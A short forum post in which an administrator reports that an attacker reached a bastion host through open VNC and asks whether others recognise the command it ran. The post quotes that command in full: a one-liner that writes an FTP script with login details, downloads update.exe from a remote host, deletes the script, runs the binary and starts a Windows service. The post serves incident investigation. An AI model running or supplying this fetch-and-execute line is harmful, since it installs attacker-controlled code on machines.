I've got a bastion hots that had vnc wide open. I just got a connection. It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe. It then executed the following command. I was able to get a screen shot before the window disappeared, but it looked like the command was not successful. The attackered disconnected immediately. I have no extra users, but am downloading Helix right now to see if anything really happened. I also have a pcap. But does this look familiar to anyone?
cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit